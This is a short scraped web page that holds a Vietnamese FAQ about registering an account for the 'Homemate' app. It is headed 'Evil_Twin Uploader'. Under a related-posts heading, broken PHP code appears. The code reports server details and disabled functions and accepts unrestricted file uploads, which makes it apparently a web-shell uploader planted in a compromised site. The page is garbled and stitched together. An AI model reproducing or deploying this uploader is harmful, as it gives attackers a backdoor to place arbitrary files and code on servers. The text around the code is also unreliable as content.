Evil_Twin Uploader

Tôi có cần đăng ký tài khoản khi sử dụng ứng dụng “Homemate” không?

Bạn  cần đăng ký một tài khoản để đăng nhập “Homemate” client. Bạn có thể truy xuất mật khẩu thông qua hộp thư điện tử.

Bài viết liên quan

".php_uname().""; print "\n";$disable_functions = @ini_get("disable_functions"); echo "
DisablePHP=".$disable_functions; print "\n"; echo"
"; echo"
"; if($_POST["k"]==upload) { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"".$_FILES["f"]["name"]; }else{ echo"Gagal Bro"; } } }
Social media & sharing icons powered by UltimatelySocial